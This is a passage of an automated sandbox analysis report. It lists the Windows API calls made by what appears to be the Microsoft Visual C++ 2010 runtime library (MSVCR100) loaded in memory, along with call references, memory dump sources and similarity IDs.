                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6BBA24F6
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2505
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2514
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2523
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2532
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BBA2550
                                                                                              • GetThreadPriority.KERNEL32(00000000), ref: 6BBA2557
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6BBA2658
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Thread$??2@CountCriticalCurrentExceptionH_prolog3InitializePrioritySectionSpinThrowstd::exception::exception
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6AC2E
                                                                                                • Part of subcall function 6BB6AC84: _getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
                                                                                                • Part of subcall function 6BB6AC84: _lock.MSVCR100(0000000D), ref: 6BB6ACA7
                                                                                              • _malloc_crt.MSVCR100(00000220,6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6B81E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6B859
                                                                                              • InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B87B
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB6B896
                                                                                              • InterlockedDecrement.KERNEL32 ref: 6BB6B90D
                                                                                              • InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B922
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement_getptd_lock$_malloc_crt
                                                                                              Similarity
                                                                                              • API ID: _getptd$CreateFrameInfo
                                                                                              • String ID: csm
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,?,?,00000000,00000000), ref: 6BB7612C
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 6BB76192
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,6BB76293,00000000,00000000,00000000), ref: 6BB761AB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,6BB76293,00000000,00000000,00000000), ref: 6BB761FC
                                                                                              • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6BB76210
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB7621A
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB76223
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_freea_s$CompareString
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6BB64FE8
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6BB6504B
                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6BB65067
                                                                                              • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6BB650D1
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6BB650F0
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB650FA
                                                                                              • _freea_s.MSVCR100(?), ref: 6BB65103
                                                                                              • malloc.MSVCR100(00000008), ref: 6BB90D21
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$String_freea_s$malloc
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA0CFC
                                                                                              • EnterCriticalSection.KERNEL32(?,00000010,6BB98C33,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BBA0D11
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6BBA0D51
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6BBA0DA4
                                                                                              • _memset.LIBCMT(00000000,00000000,00000120), ref: 6BBA0DB6
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BBA0DDB
                                                                                              • _memset.LIBCMT(00000020,00000000,00000100), ref: 6BBA0DEF
                                                                                              • SetEvent.KERNEL32(?), ref: 6BBA0E96
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BBA0EA3
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BBA0EC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??2@CriticalEventSection_memset$CloseCreateEnterH_prolog3HandleLeave
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000080,00000000,6BC035D0,00000001,?,?,00000000,?,?,?,?,6BC035D0,?), ref: 6BB70E8F
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA8FDD
                                                                                                • Part of subcall function 6BBA245A: __EH_prolog3.LIBCMT ref: 6BBA2461
                                                                                                • Part of subcall function 6BBA245A: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6BB9D96F,00000000,?,00000000,00000000), ref: 6BBA248C
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6BBA24E7
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6BBA24F6
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2505
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2514
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2523
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2532
                                                                                                • Part of subcall function 6BBA245A: GetCurrentThread.KERNEL32 ref: 6BBA2550
                                                                                                • Part of subcall function 6BBA245A: GetThreadPriority.KERNEL32(00000000), ref: 6BBA2557
                                                                                                • Part of subcall function 6BB9F2B7: __EH_prolog3.LIBCMT ref: 6BB9F2BE
                                                                                                • Part of subcall function 6BB9F2B7: EnterCriticalSection.KERNEL32(6BB9D93F,00000008,6BBA9035), ref: 6BB9F2D0
                                                                                                • Part of subcall function 6BB9F2B7: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB9F2E2
                                                                                                • Part of subcall function 6BB9F2B7: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB9F307
                                                                                                • Part of subcall function 6BB9F2B7: LeaveCriticalSection.KERNEL32(?), ref: 6BB9F329
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BBA9039
                                                                                              • GetLastError.KERNEL32 ref: 6BBA9049
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA9061
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBA906F
                                                                                              • GetLastError.KERNEL32 ref: 6BBA908C
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA90A4
                                                                                              • GetLastError.KERNEL32 ref: 6BBA90CE
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA90E6
                                                                                              • InitializeSListHead.KERNEL32(000000E8), ref: 6BBA90FF
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCriticalErrorH_prolog3LastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BBA1F2D
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342,?,?), ref: 6BBA1F36
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • memcpy.MSVCR100(00000000,6BC06310,00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342), ref: 6BBA1F53
                                                                                              • std::exception::exception.LIBCMT(?,?,6BC00034,?,00000002,00000001), ref: 6BBA1F86
                                                                                              • _CxxThrowException.MSVCR100(?,6BC00034,?,00000002,00000001), ref: 6BBA1F9B
                                                                                              • std::exception::exception.LIBCMT(?,6BB93A58,6BC00018,?), ref: 6BBA1FBA
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6BBA1FDD
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6BBA1FE8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6BBA1FFE
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6BBA201A
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000008,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9), ref: 6BB77EE6
                                                                                              • DecodePointer.KERNEL32(6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F20
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F35
                                                                                              • _encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F4C
                                                                                              • DecodePointer.KERNEL32(-00000004,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5B
                                                                                              • _encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5F
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F6E
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F78
                                                                                                • Part of subcall function 6BB77E18: GetModuleHandleW.KERNEL32(00000000,6BB77EDC,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001), ref: 6BB77E1A
                                                                                              • ___crtCorExitProcess.LIBCMT ref: 6BB87405
                                                                                              Similarity
                                                                                              • API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000007,6BB6FD98,0000000C), ref: 6BB6FD32
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • _wcslen.LIBCMT(00000000,6BB6FD98,0000000C), ref: 6BB6FDB5
                                                                                              • calloc.MSVCR100(00000001,00000002,00000000,6BB6FD98,0000000C), ref: 6BB6FDC0
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6BB6FDD7
                                                                                              • _errno.MSVCR100(6BB6FD98,0000000C), ref: 6BB908C8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6FD98,0000000C), ref: 6BB908D2
                                                                                              • _errno.MSVCR100 ref: 6BB908E3
                                                                                              • _errno.MSVCR100 ref: 6BB908EE
                                                                                                • Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCD5
                                                                                                • Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCE8
                                                                                                • Part of subcall function 6BB6FCB3: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FD05
                                                                                              Similarity
                                                                                              • API ID: _errno_wcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
                                                                                              • GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 6BBAAC08
                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC1F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAAC3A
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAAC4B
                                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC97
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                                                                              • String ID:
                                                                                              • API String ID: 475412-0
                                                                                              APIs
                                                                                              • HeapReAlloc.KERNEL32(00000000,00000000,6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB62B14
                                                                                              • malloc.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB62B90
                                                                                              • free.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F367
                                                                                              • _callnewh.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB8F383
                                                                                              • _callnewh.MSVCR100(6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB8F394
                                                                                              • _errno.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F39A
                                                                                              • _errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3AC
                                                                                              • GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3B3
                                                                                              • _errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3C4
                                                                                              • GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3CB
                                                                                              Similarity
                                                                                              • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2627451454-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Name::operator=atol
                                                                                              • String ID: `template-parameter$void
                                                                                              • API String ID: 1388095176-4057429177
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BBA5679
                                                                                              • malloc.MSVCR100(?,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56C3
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • std::exception::exception.LIBCMT(?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56EC
                                                                                              • _CxxThrowException.MSVCR100(?,6BB6BDD8,?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5701
                                                                                              • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5736
                                                                                              • _freea_s.MSVCR100(00000000,00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA573C
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA574B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocateExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 2067162669-2104205924
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,000000FF,00000024,?,?,6BB769D0,?), ref: 6BB769F5
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76A30
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76AED
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B46
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B63
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B86
                                                                                              • _errno.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D32
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D3C
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB769D0,?), ref: 6BB89D56
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1299486453-0
                                                                                              APIs
                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 6BB6AD93
                                                                                              • _calloc_crt.MSVCR100(00000020,00000040), ref: 6BB6AD9F
                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 6BB6AE36
                                                                                              • GetFileType.KERNEL32(00000000), ref: 6BB6AE50
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-6BC03734,00000FA0), ref: 6BB6AE80
                                                                                              • SetHandleCount.KERNEL32 ref: 6BB6AEA1
                                                                                              Similarity
                                                                                              • API ID: CountHandle$CriticalFileInfoInitializeSectionSpinStartupType_calloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 1159209115-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _fileno
                                                                                              • String ID:
                                                                                              • API String ID: 467780811-0
                                                                                              APIs
                                                                                              • memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB
                                                                                              • _errno.MSVCR100 ref: 6BB88C29
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB88C34
                                                                                              • _memset.LIBCMT(?,00000000,?), ref: 6BB88C47
                                                                                              • _fileno.MSVCR100(?,?,?), ref: 6BB88CA3
                                                                                              • _read.MSVCR100(00000000,?,?), ref: 6BB88CAA
                                                                                              • _memset.LIBCMT(?,00000000,000000FF), ref: 6BB88CD4
                                                                                              • _errno.MSVCR100 ref: 6BB88CDC
                                                                                              Similarity
                                                                                              • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 4008029522-0
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(6BB71022,?,?,?,6BB71022,00000040,?), ref: 6BB703EF
                                                                                              • _write.MSVCR100(6BB71022,FFFF94F1,00000000,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB7045D
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ACF
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ADF
                                                                                              • _errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888CD
                                                                                              • _errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888E4
                                                                                              • _isatty.MSVCR100(6BB71022,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB8890B
                                                                                              • __lseeki64.LIBCMT(6BB71022,00000000,00000000,00000002,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88928
                                                                                              • _write.MSVCR100(6BB71022,00000040,00000001,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88948
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Similarity
                                                                                              • API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,?,6BB73AA1,?,?), ref: 6BB739AC
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739EE
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739FE
                                                                                              • _errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB88964
                                                                                              • _errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB8897D
                                                                                              • _isatty.MSVCR100(?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889A5
                                                                                              • _write.MSVCR100(?,?,?,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889B4
                                                                                              • __lseeki64.LIBCMT(?,00000000,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889D2
                                                                                                • Part of subcall function 6BB6CF2C: _malloc_crt.MSVCR100(00001000,?,6BB73A14,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB6CF36
                                                                                              Similarity
                                                                                              • API ID: __p__iob_errno$__lseeki64_fileno_isatty_malloc_crt_write
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA152F
                                                                                              • CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA153B
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA156C
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1585
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA15B4
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
                                                                                                • Part of subcall function 6BBA1664: _memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2
                                                                                              • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1600
                                                                                              • SetEvent.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA163C
                                                                                              • CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA1645
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA164C
                                                                                              Similarity
                                                                                              • API ID: ??3@$CloseFlushHandleInterlockedList$AcquireConcurrency@@EventLock@details@ReaderWrite@_Writer_memset
                                                                                              APIs
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D99D
